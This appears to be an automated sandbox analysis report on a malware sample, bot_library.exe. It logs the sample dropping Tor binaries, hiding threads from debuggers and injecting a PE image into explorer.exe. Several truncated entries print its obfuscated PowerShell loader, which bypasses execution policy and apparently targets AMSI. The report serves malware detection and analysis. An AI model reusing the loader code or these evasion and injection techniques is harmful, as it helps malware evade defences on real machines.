Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: bot_library.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: bot_library.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: bot_library.exe

Static file information: File size 5029376 > 1048576

Source: bot_library.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2fac00
Source: bot_library.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1a0000

Source: bot_library.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: bot_library.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: bot_library.pdb> source: bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: bot_library.pdb source: bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($DVVemkOahpu8su, $xKiBid8qRA54vF95cHp).Invoke([char](97)+[char](109)+[char](115)+[char](105)+[char](46)+[char](100)+[char](108)+[char](108)) $dkxoFnOvnR4GkN4Ph = $Wnm1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[

Suspicious powershell command line found

Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha			Jump to behavior

Source: conjure-client.exe.0.dr	Static PE information: section name: .symtab
Source: lyrebird.exe.0.dr	Static PE information: section name: .symtab
Source: snowflake-client.exe.0.dr	Static PE information: section name: .xdata
Source: snowflake-client.exe.0.dr	Static PE information: section name: .symtab
Source: tor-gencert.exe.0.dr	Static PE information: section name: .buildid
Source: tor.exe.0.dr	Static PE information: section name: .buildid

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832152DA5 pushad ; ret	3_2_00007FF832152DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832152DB3 pushad ; ret	3_2_00007FF832152DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832152EDA pushad ; iretd	3_2_00007FF832152EF1

Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Tor\tor\tor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Windows\System32\iRAjHsIkbP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Tor\tor\pluggable_transports\snowflake-client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Tor\tor\pluggable_transports\conjure-client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Tor\tor\pluggable_transports\lyrebird.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Tor\tor\tor-gencert.exe	Jump to dropped file

Source: C:\Users\user\Desktop\bot_library.exe

File created: C:\Windows\System32\iRAjHsIkbP.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00007FF832152AD3 sldt word ptr [eax-07CDCB54h]

3_2_00007FF832152AD3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9921

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	Dropped PE file which has not been started: C:\Tor\tor\pluggable_transports\snowflake-client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	Dropped PE file which has not been started: C:\Tor\tor\pluggable_transports\conjure-client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	Dropped PE file which has not been started: C:\Tor\tor\pluggable_transports\lyrebird.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bot_library.exe	Dropped PE file which has not been started: C:\Tor\tor\tor-gencert.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192

Thread sleep count: 9921 > 30

Jump to behavior

Source: tor.exe, 00000005.00000003.99802784963.0000028359576000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000002.100622125053.000002835BBC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBALxlVHyDC24hGFskNP37pw07UtREIXXVayU8CnUOp+K/DlgX8HJBmul4
Source: tor.exe, 00000005.00000002.100618874179.000002835AE26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wYFo4HaT809aWcgWjW6tAAlHVMcIhsGkdUxu/s6LNnNs6ZgEgUAKX79CuKilH7SB
Source: tor.exe, 00000005.00000003.99775912110.0000028359574000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: tor.exe, 00000005.00000002.100619089012.000002835AF26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntor-onion-key eupzyeqjqeMuhQhQ3DkHvUvI6v8yC+sYKBBE/oSTd3k
Source: bot_library.exe, 00000000.00000003.99963293345.00000246AE012000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99961894361.00000246ADFF3000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962904781.00000246AE006000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962440340.00000246AE005000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000002.100611977010.00000283572FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\bot_library.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\bot_library.exe

Memory allocated: C:\Windows\explorer.exe base: 400000 protect: page execute and read and write

Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\bot_library.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\bot_library.exe

Memory written: C:\Windows\explorer.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\Desktop\bot_library.exe

Memory written: PID: 8404 base: 400000 value: 4D

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\bot_library.exe

Memory written: C:\Windows\explorer.exe base: 400000

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Tor\tor\tor.exe "C:/Tor/tor/tor.exe" -f C:/Tor/torrc	Jump to behavior

